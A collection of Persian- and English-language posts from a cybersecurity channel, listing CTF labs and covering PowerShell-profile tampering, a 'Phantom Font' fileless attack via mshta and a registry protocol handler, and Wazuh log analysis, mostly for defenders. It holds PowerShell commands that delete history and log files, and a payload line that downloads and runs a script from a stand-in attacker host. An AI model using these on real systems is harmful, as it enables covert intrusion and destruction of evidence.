⭐️FREE LABS RED TEAM/BLUE TEAM and CTF SKILLS TO 2025

💎Share with your network and friends.💎

· Attack-Defense - https://attackdefense.com
· Alert to win - https://alf.nu/alert1
· Buffer Overflow Labs - https://github.com/CyberSecurityUP/Buffer-Overflow-Labs
· CryptoHack - https://cryptohack.org/
· CMD Challenge - https://cmdchallenge.com
· Cyberdefenders - https://cyberdefenders.org/blueteam-ctf-challenges/
· Damn Vulnerable Repository - https://encurtador.com.br/ge2Rp
· Defend The Web - https://defendtheweb.net/
· Exploitation Education - https://exploit.education
· Google CTF - https://capturetheflag.withgoogle.com/
· HackTheBox - https://www.hackthebox.com
· Hacker101 - https://ctf.hacker101.com
· Hacking-Lab - https://hacking-lab.com/
· ImmersiveLabs - https://immersivelabs.com
· Infinity Learning CWL - https://cyberwarfare.live/infinity-learning/
· LetsDefend- https://letsdefend.io/
· NewbieContest - https://www.newbiecontest.org/
· OverTheWire - https://overthewire.org
· Practical Pentest Labs - https://practicalpentestlabs.com/
· Pentestlab - https://pentesterlab.com
· Penetration Testing Practice Labs - https://www.amanhardikar.com/mindmaps/Practice.html
· PentestIT LAB - https://lab.pentestit.ru
· PicoCTF - https://picoctf.com
· PWNABLE - https://pwnable.kr/play.php
· Root-Me - https://www.root-me.org
· Red Team Exercises - https://github.com/CyberSecurityUP/Red-Team-Exercises
· Root in Jail - https://rootinjail.com
· SANS Challenger - https://www.holidayhackchallenge.com/
· SmashTheStack - https://smashthestack.org/wargames.html
· The Cryptopals Crypto Challenges - https://cryptopals.com
· Try Hack Me - https://tryhackme.com
· Vulnhub - https://www.vulnhub.com
· Vulnmachine - https://www.vulnmachines.com/
· W3Challs - https://w3challs.com
· WeChall - https://www.wechall.net
· Websploit - https://websploit.org/
· Zenk-Security - https://www.zenk-security.com/
Did I forget a lab? comment there

#ctf #pentest #redteam #blueteam #hacking #informationsecurity #cybersecurity

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

♨️ AttackRuleMap
🔺 پروژه مپ Atomic Red Team بر روی
🔘 Splunk ESCU ( در حال تکمیل/فعلا ویندوز )
🔘 Sigma Rules

🔗 https://attackrulemap.netlify.app/

#sigma #Splunk #ESCU #BlueTeam #SOC

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

⚠️وقتی ویندوز علیه شما دستکاری می‌شود: تعییر پروفایل پاورشل
بحثی پیرامون مدل بلوغ SOC در دوره CISSP
#blueteam #cissp

برای مثال، در یک سناریوی واقعی، هکر می‌تواند تغییراتی در پروفایل پاورشِل (PowerShell Profiles)اعمال کند تا از کشف فعالیت‌های مخرب خود جلوگیری کند. این پروفایل‌ها فایل‌های اسکریپتی هستند که هنگام اجرای پاورشِل بارگذاری می‌شوند و می‌توانند برای تغییر تنظیمات و محیط پاورشِل استفاده شوند.

❇️مثال سناریوی مخرب:
هکر می‌تواند با اضافه کردن اسکریپتی به پروفایل پاورشِل، ردپاهای لاگ‌برداری یا فرمان‌های قبلی را حذف کند.

فایل‌های پروفایل پاورشِل:
پروفایل‌ها معمولاً در یکی از مسیرهای زیر قرار دارند:
- C:\Users\<UserName>\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
- C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1

👈تغییر مخرب:
هکر می‌تواند کدی مانند زیر به پروفایل اضافه کند:

powershell
پاک کردن تاریخچه فرمان‌ها
Remove-Item -Path (Get-PSReadlineOption).HistorySavePath -Force
غیرفعال کردن تاریخچه برای استفاده‌های بعدی
Set-PSReadlineOption -HistorySaveStyle SaveNothing

پنهان کردن فرمان‌ها در لاگ‌های Event Viewer
$LogFile = "C:\Windows\System32\LogFiles\PowerShell.evtx"
Remove-Item -Path $LogFile -Force -ErrorAction SilentlyContinue


☣️اثرات:
1. پاک کردن تاریخچه دستورات: تمام دستورات اجرا شده در پاورشِل حذف می‌شوند.
2. غیرفعال کردن ثبت دستورات: تضمین می‌کند که تاریخچه دستورات جدید ثبت نشود.
3. حذف فایل‌های لاگ: فایل‌های لاگ مرتبط با پاورشِل از سیستم حذف می‌شوند.


✅ نحوه تشخیص:
- بررسی تغییرات در فایل‌های پروفایل پاورشِل (مانند تغییر زمان آخرین ویرایش).
- استفاده از ابزارهای SIEM (مانند Splunk) برای شناسایی فعالیت‌های غیرمعمول.
- اجرای دستوری برای مشاهده پروفایل کاربر:
powershell
Get-Content $PROFILE

- استفاده از نرم‌افزارهای نظارتی برای جلوگیری از تغییر در فایل‌های پروفایل حساس.

🔰راهکارهای پیشگیرانه:
1. فعال کردن AppLocker یا WDAC:برای جلوگیری از اجرای پروفایل‌های غیرمجاز.
2. محدود کردن دسترسی به فایل‌های پروفایل: فقط کاربران مجاز بتوانند این فایل‌ها را تغییر دهند.
3. استفاده از مانیتورینگ پاورشِل:نظارت بر دستورات و فایل‌های پروفایل پاورشِل با ابزارهایی مانند Microsoft Defender for Endpoint.

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

بعضی‌ها رسماً به مرحله‌ای رسیدن که دارن «چیزهای رایگان» رو هم می‌فروشن!

این روزها نسخه آماده #Nessus از طریق #Docker رایگان و در دسترس همه‌ست… ولی دیدم بعضی‌ها همین رو بسته‌بندی کردن و با قیمت بالا می‌دن به ملت 🤦‍♂️

هیچ جادوی خاصی پشتش نیست، فقط یک docker pull ساده‌ست!

واقعاً حیفه که وقت و پول مردم صرف چیزی بشه که با یک خط دستور میشه آورد بالا.

📂 لینک نسخه آماده روی Docker Hub:

https://hub.docker.com/r/sakurashiro/nessus

#nessus #docker #vulnerability_assessment #cybersecurity #infosec #soc #securitytools #redteam #blueteam #hide01

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

🎯 حمله فونت شبح (Phantom Font Attack): جایی که mshta.exe با رجیستری متحد می‌شود!

یک فونت، یک فایل .reg و ابزار قانونی mshta.exe
و این سه در کنار هم می‌توانند یک حمله Fileless واقعی بسازند که حتی EDRها هم جا بمانند!



🔎 پراسس mshta.exe چیست و چرا باید به آن شک کرد؟

پراسس mshta.exe یک ابزار رسمی ویندوز است که برای اجرای فایل‌های hta (HTML Application) طراحی شده است.
این فایل‌ها می‌توانند شامل JavaScript و VBScript باشند و mshta.exe آنها را با سطح دسترسی کاربر اجرا می‌کند.

📌 محل پیش‌فرض:
C:\\Windows\\System32\\mshta.exe



چرا مهاجمان عاشق mshta.exe هستند؟

✅ به‌صورت پیش‌فرض در ویندوز نصب است (Living Off The Land)
✅ اجرای مستقیم اسکریپت حتی از اینترنت یا رجیستری
✅ اغلب در لیست سفید آنتی‌ویروس و EDR قرار دارد
✅ ابزاری برای اجرای حملات Fileless و مخفیانه



📌 نمونه استفاده مخرب:


mshta.exe "javascript​ : new ActiveXObject('WScript[.]Shell').Run('calc.exe');close();"




🧩 مراحل حمله فونت شبح:

1️⃣ طعمه (Phishing)
قربانی ایمیلی با لینک نصب فونت شرکت دریافت می‌کند (مثلاً CorpSans.ttf)
اما به‌جای فونت، یک فایل مشکوک .reg را دانلود می‌کند.

2️⃣ تغییر رجیستری (Registry Trick)
فایل .reg یک Protocol Handler جعلی به نام fontview:// تعریف می‌کند.
و می‌گوید: «اگر fontview://load فراخوانی شد، این دستور mshta را اجرا کن»:


[HKEY_CLASSES_ROOT\\fontview\\shell\\open\\command]
@="mshta.exe \"javascript​:eval(new ActiveXObject('WScript[.]Shell').RegRead('HKCU\\\\Software\\\\PhantomFont\\\\Payload'));window.close();\""


3️⃣ اجرای کد بدون فایل (Fileless Execution)
صفحه وب به fontview://load ریدایرکت می‌شود.
پراسس mshta.exe اجرا می‌شود، مقدار Payload از رجیستری خوانده می‌شود و PowerShell مخفیانه اجرا می‌شود:

javascript
var sh = new ActiveXObject('WScript[.]Shell');
sh[.]Run('powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(\'hxxp://attacker[.]com/stage2.ps1\'))"', 0, false);




🔍 چرا این حمله خطرناک است؟

✅ Fileless → هیچ فایل اجرایی روی دیسک نیست
✅ استفاده از ابزار قانونی ویندوز (mshta.exe)
✅ ذخیره کد در رجیستری → بدون فایل مشکوک
✅ اجرا به‌صورت Stealth (بدون پنجره و هشدار)



🛡 نکات مهم برای Blue Team:

🔸 اجرای mshta.exe باید محدود یا مانیتور شود
🔸 تغییرات در مسیر HKEY_CLASSES_ROOT و Protocol Handlerها را لاگ کنید
🔸 هر اجرای ناگهانی mshta بدون فایل .hta را بررسی کنید
🔸 تحلیل دقیق ترافیک شبکه و DNS برای ارتباط با سرورهای مشکوک



🔐 یک فونت کافی است تا دری به سوی حمله باز شود.
امروز به mshta.exe شک کنید!

#RedTeam #BlueTeam #Malware #Phishing #FilelessAttack #RegistryHacking #mshta #CyberSecurity #WindowsSecurity #ThreatIntel #EDRBYPASS

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

🧠 Log Analysis + Wazuh Integration — Hands-On Mini Lab for Blue Teamers 🚀

Just finished going through this practical guide on Linux & Windows log analysis with Wazuh and it’s one of the clearest step-by-step walkthroughs I’ve seen for juniors and SOC beginners.

Here’s what you’ll practice inside the PDF:

🔹 Linux Log Analysis

Exploring key log files under /var/log (boot, cron, secure, mail, httpd, messages)
Verifying package installation logs via apt
Reviewing firewall activity with UFW logs

🔹 Windows Event Log Analysis

Enabling audit policies via Local Security Policy
Using Event Viewer to track security events (e.g. 4625, 4776)
Simulating RDP brute-force attempts and interpreting the resulting logs

🔹 Wazuh Integration (SIEM)

Configuring ossec.conf for Linux & Windows log collection
Validating events in the Wazuh dashboard (Threat Hunting & Discover views)
Correlating firewall, package, and authentication events across hosts

🎯 Great for:
Students, SOC interns, junior analysts, and anyone who wants a lab-style intro to log analysis + Wazuh without getting lost in theory.

📘 I’ve attached the PDF — worth saving if you’re building your Blue Team fundamentals or preparing for SOC roles.

What other SIEM or log analysis topics would you like to see broken down like this?

#Wazuh #SIEM #LogAnalysis #SOCAnalyst #BlueTeam #DFIR #Linux #WindowsSecurity #CyberSecurity #ThreatHunting

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer